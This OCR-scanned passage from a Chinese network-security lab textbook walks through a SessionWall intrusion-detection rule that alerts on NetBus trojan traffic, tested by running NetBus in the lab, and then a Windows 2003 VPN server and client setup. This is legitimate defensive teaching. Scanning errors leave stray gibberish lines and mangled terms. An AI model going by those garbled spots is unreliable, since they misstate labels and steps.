话 框 如 图 10-66 所 示 。 
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图 10-66 Intrusion Attempt Detection Rules 对 话 框 


(2) 单 击 左下 角 的 Edit Rules 按钮 ， 选 择 New 一 Insert before 命令 ， 如 图 10-80 所 示 。 

(3) 输入 NetBus 作为 名 称 ， 按 Enter 键 确认 。 注 意 ， 以 NetBus 命名 并 不 是 必须 的 ， 但 
可 以 标示 规则 的 功用 ， 表 示 是 用 来 监视 NetBus 活动 的 。 

(4) 在 出 现 的 Client 对 话 框 中 ， 选 择 RANGE， 这 一 步 是 用 来 确定 规则 所 起 作用 的 主机 
的 全 地 址 的 范围 ， 如 图 10-67 所 示 。 

(5) 单 击 Add 按钮 ， 打 开 Select Network Object Type 对 话 框 ， 如 图 10-68 所 示 。 

(6) 选择 RANGE， 然 后 单 击 Add 按钮 ， 打 开 RANGE Properties 对 话 框 ， 如 图 10-69 
所 示 。 将 范围 名 称 命名 为 New RANGE，IP 分 别 输入 自己 的 IP 地 址 和 合作 伙伴 的 人 地 
址 ， 然 后 单 击 OK 按钮 ， 再 单 击 Next 按钮 。 
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图 10-66 新 建 规则 图 10-67 ”Client 对 话 框 


RANGE Properties 
Select Network Object Type 





10-68 ”Select Network Object Type 对 话 框 10-69 RANGE Properties 对 话 框 


(7) 单 击 Next 按钮 ， 在 出 现 的 Server 对 话 框 中 ， 选 中 Any station， 单 击 “ 下 一 步 ” 按 
钮 ， 如 图 10-70 所 示 。 

(8) 进入 Type 对 话 框 ， 滚 动 列 表 框 ， 找 到 Intrusion detection: NetBus Traffic 项 后 加 亮 
显示 ， 如 图 10-71 所 示 。 





图 10-71 Type 对 话 框 
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(9) 单 击 Properties 按钮 ， 显 示 该 规则 的 原始 定义 与 设置 ， 如 图 10-72 所 示 。 单 击 OK 
按钮 ， 在 Type 对 话 框 中 单 击 “下 一 步 ”按钮 。 

(10) 在 Action 对 话 框 中 ， 选 择 Log It 图 标 以 记录 NetBus 活动 情况 ， 如 图 10-73 
所 示 。 





[7 [Tntrision detection 
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OO Buffer overflow 





图 10-72 Rule Type Properties 对 话 框 10-73 ”Action 对 话 框 


(11) 单 击 Properties 按钮 ， 然 后 选中 Windows NT Event Log 复 选 框 ， 输 入 一 个 文本 
字符 串 用 来 在 检测 到 NetBus 活动 时 发 出 警报 文字 ， 单 击 OK 按钮 ， 单 击 Next 按钮 ， 如 
图 10-74 所 示 。 

(12) 在 Time 对 话 框 中 ， 确 保 Always 复 选 框 被 选中 ， 然 后 单 击 “下 一 步 ” 按 钮 ， 如 
10-75 所 示 。 在 Description 对 话 框 中 ， 键 入 一 个 描述 名 称 ， 然 后 单 击 Next 按钮 ， 在 
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图 10-74 Action Properties 对 话 框 图 10-75 ”Time 对 话 框 
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10-76 ”User Properties 对 话 框 





(13) 单 击 OK 按钮 ，Intrusion Attempt Detection Rules 对 话 框 中 将 显示 刚 定义 的 NetBus 
规则 ， 单 击 OK 按钮 。 接 下 来 将 对 NetBus 规则 定义 进行 测试 ， 如 图 10-77 所 示 。 














10-77 ”完成 规则 定义 


(14) 最 小 化 SessionWall， 打 开 NetBus， 建 立 一 个 连接 。 最 小 化 NetBus， 同 时 最 大 化 
SessionWall， 选 择 View 一 Alert Message 菜单 命令 ,或 者 单 击 Show Alert Messages 按钮 ， 
双击 所 显示 的 关于 NetBus 连接 的 警报 信息 ， 查 看 详细 信息 。 


实 训 5 Windows 系统 VPN 的 实现 


1. 实 训 目 的 

虚拟 专用 网 络 (Virtual Private Network，VPN) 是 专用 网 络 的 延伸 ， 它 包含 了 类 似 
Intemet 的 共享 或 公共 网 络 连接 。 通 过 本 实验 ， 使 学 生 加 深 对 VPN 的 认识 。 

2. 实 训 环境 

一 台 Windows 2003 VPN 服务 器 (能 与 mteret 相连 )、 一 台 Windows 7 客户 端 (Windows 
XP 也 可 以 )， 两 台 机 器 局 域 网 互通 。 

3. 实 训 内 容 和 步骤 

1) 启动 VPN 服务 器 

(1) 选择 “开始 ”一 “管理 工具 ”一 “路 由 和 远程 访问 ”菜单 命令 ， 打 开 “ 路 由 和 远 
程 访问 ”服务 窗口 ; 在 窗口 右边 右 击 本 地 计算 机 名 ,选择 “配置 并 启用 路 由 和 远程 访 
问 ” 命 令 ， 如 图 10-78 所 示 。 
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10-78 ”路 由 和 远程 访问 


(2) 在 出 现 的 向 导 窗 口 单 击 “ 下 一 步 ”按钮 ， 进 入 服务 选择 窗口 ， 如 图 10-79 所 示 。 
如 果 服 务 器 只 有 一 块 网 卡 ， 只 能 选择 “ 自 定义 配置 ”选项 。 









图 10-79 ”路 由 和 远程 访问 服务 器 安装 向 导 


(3) 在 自 定义 配置 窗口 中 ， 如 图 10-80 所 示 ， 选 中 “VPN 访问 ” 复 选 框 ， 单 击 “ 下 一 
步 ”按钮 。 
(4) 配置 完成 ， 如 图 10-81 所 示 。 单 击 “ 是 ”按钮 ， 启 动 VPN 服务 。 


路 由 和 运程 访问 能 向导 | 





自 定义 配置 
关闭 此 了 向 导 后 ， 悠 可 以 在 路 由 和 运程 访问 控制 台中 卫 置 过 择 的 服务 





图 10-80 自 定义 配置 图 10-81 配置 完成 
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(5) 启动 了 VPN 服务 后 ， 





将 操作 Qi 放 思 


“路 由 和 远程 访问 ”窗口 如 图 10-82 所 示 。 
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此 服务 器 上 配置 了 路 由 和 远程 访问 


3 让 部 看 方 案 ， 以 及 媳 本 解答 的 更 多 信和 ， 
刘 池 刚 由 ## 二 种 访问 备 肘 。 
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10-82 ”VPN 服务 启动 后 的 “路 由 和 远程 访问 ”窗口 


2) 配置 VPN 服务 器 


(1) 在 图 10-82 的 服务 器 上 右 击 ， 选 择 “属性 ”命令 ， 在 弹出 的 窗口 中 选择 卫 标签 ， 
在 “IP 地 址 指派 ” 栏 中 选择 “静态 地 址 池 ”。 
(2) 单 击 “ 添 加 ”按钮 设置 IP 地 址 范围 ， 这 个 IP 范围 就 是 VPN 局 域 网 内 部 的 虚拟 人 P 
地 址 范围 ， 这 里 设置 为 10.240.60.1 一 10.240.60.10， 一 共 10 个 卫 ， 默 认 的 VPN 服务 器 占用 
第 一 个 卫 ， 所 以 ，10.240.60.1 实际 上 就 是 这 个 VPN 服务 器 在 虚拟 局 域 网 的 卫 ， 如 图 10-83 


所 示 。 
3) 添加 VPN 用 户 


(1) 打开 管理 工具 中 的 计算 机 管理 ， 在 本 地 用 户 和 组 中 添加 用 户 ， 这 里 以 添加 一 个 


chnking 用 户 为 例 。 


(2) 先 新 建 一 个 叫 chnking 的 用 户 ， 创 建 好 后 ， 查 看 这 个 用 户 的 属性 ， 在 “ 拨 入 ”选项 
卡 中 做 相应 的 设置 ， 如 图 10-84 所 示 。 
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10-83 添加 “静态 地 址 池 ” 
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图 10-84 


“ 拨 入 ”选项 卡 
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(3) “远程 访问 权限 ”设置 为 “允许 访问 ”， 以 允许 这 个 用 户 通过 VPN 拨 入 服务 器 。 

(4) 选中 “分 配 静态 IP 地 址 ” 复 选 框 ， 并 设置 一 个 VPN 服务 器 中 静态 IP 池 范围 内 的 
一 个 也 地 址 ， 这 里 设 为 10.240.60.2。 

4) 配置 Windows 2003 客户 端 

(1) 选择 “程序 ”一 “附件 ”一 “通讯 ”一 “新 建 连接 向 导 ” 菜 单 命令 ， 启 动 “ 新 建 
连接 向 导 ”。 在 如 图 10-85 所 示 网 络 连接 类 型 界面 中 ， 选 择 “连接 到 我 的 工作 场所 的 网 
络 ”， 这 个 选项 是 用 来 连接 VPN 的 ， 单 击 “ 下 一 步 ” 按 钮 。 





图 10-85 网络 连接 类 型 
(2) 在 网 络 连 接 界面 中 ， 选 择 “虚拟 专用 网 络 连接 ”， 单 击 “ 下 一 步 ”按钮 ， 如 图 10-86 
所 示 。 





图 10-86 网络 连接 


(3) 在 连接 名 界面 中 ， 填 入 连接 名 称 szbti， 单 击 “ 下 一 步 ” 按 钮 。 
(4) 在 VPN 服务 器 选择 界面 中 ， 输 入 VPN 服务 器 的 公 网 卫 ， 如 图 10-87 所 示 。 
(5) 完成 连接 。 在 “控制 面板 ”一 “网 络 连接 ”一 “虚拟 专用 网 络 ” 下 面 可 以 看 到 刚 
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才 新 建 的 szbti 连接 ， 如 图 10-88 所 示 。 












10-87 ”VPN 服务 器 选择 10-88 ”新 建 的 szbti 连接 


(6) 在 szbti 连接 上 右 击 ， 选 择 “ 属 性 ”命令 ， 在 弹出 的 对 话 框 中 单 击 “ 网 络 ”标签 ， 
然后 选中 “Internet 协议 (TCP/IP)”， 单 击 “ 属 性 ”按钮 ， 在 弹出 的 对 话 框 中 再 单 击 “ 高 
级 ”按钮 ， 如 图 10-89 所 示 ， 取 消 选 中 “在 远程 网 络 上 使 用 默认 网 关 ” 复 选 框 。 


10-89 新 建 szbti 连接 的 “属性 ”配置 


(7) 双击 szbti 连接 ， 输 入 分 配给 这 个 客户 端的 用 户 名 和 密码 ， 拨 通 后 在 任务 栏 的 右 下 
角 会 出 现 一 个 网 络 连接 的 图 标 ， 表 示 已 经 拨 入 到 VPN 服务 器 。 
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